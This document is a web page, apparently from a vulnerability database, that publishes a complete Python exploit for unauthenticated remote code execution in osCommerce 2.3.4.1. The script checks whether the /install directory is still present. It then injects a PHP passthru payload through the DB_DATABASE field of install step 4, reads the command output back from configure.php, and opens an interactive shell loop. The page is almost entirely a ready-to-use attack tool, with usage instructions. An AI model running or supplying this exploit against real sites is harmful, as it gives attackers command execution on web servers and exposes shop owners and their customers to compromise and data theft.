Monday, July 19, 2021

osCommerce 2.3.4.1 Remote Code Execution

code execution exploit remote vulnerabilities In: , , , 
# Exploit Title: osCommerce 2.3.4.1 - Remote Code Execution (2)
# Vulnerability: Remote Command Execution when /install directory wasn't removed by the admin
# Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php
# Notes: The RCE doesn't need to be authenticated
# Date: 26/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage: https://www.oscommerce.com/
# Version: osCommerce 2.3.4
# Tested on: Windows

import requests
import sys

if(len(sys.argv) != 2):
  print("please specify the osCommerce url")
  print("format: python3 osCommerce2_3_4RCE.py <url>")
  print("eg: python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog")
  sys.exit(0)

baseUrl = sys.argv[1]
testVulnUrl = baseUrl + '/install/install.php'

def rce(command):
  #targeting the finish step which is step 4
  targetUrl = baseUrl + '/install/install.php?step=4'

  payload = "');"
  payload += "passthru('" + command + "');"    # injecting system command here
  payload += "/*"

  #injecting parameter
  data = {
    'DIR_FS_DOCUMENT_ROOT': './',
    'DB_DATABASE' : payload
  }  

  response = requests.post(targetUrl, data=data)

  if(response.status_code == 200):
    #print('[*] Successfully injected payload to config file')

    readCMDUrl = baseUrl + '/install/includes/configure.php'
    cmd = requests.get(readCMDUrl)

    commandRsl = cmd.text.split('\n')

    if(cmd.status_code == 200):
      #print('[*] System Command Execution Completed')
      #removing the error message above
      for i in range(2, len(commandRsl)):
        print(commandRsl[i])
    else:
      return '[!] Configure.php not found'

        
  else:
    return '[!] Fail to inject payload'



#testing vulnerability accessing the directory
test = requests.get(testVulnUrl)

#checking the install directory still exist or able to access or not
if(test.status_code == 200):
  print('[*] Install directory still available, the host likely vulnerable to the exploit.')
  
  #testing system command injection
  print('[*] Testing injecting system command to test vulnerability')
  cmd = 'whoami'

  print('User: ', end='')
  err = rce(cmd)

  if(err != None):
    print(err)
    sys.exit(0)

  while(True):
    cmd = input('RCE_SHELL$ ')
    err = rce(cmd)

    if(err != None):
      print(err)
      sys.exit(0)

else:
  print('[!] Install directory not found, the host is not vulnerable')
  sys.exit(0)
 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore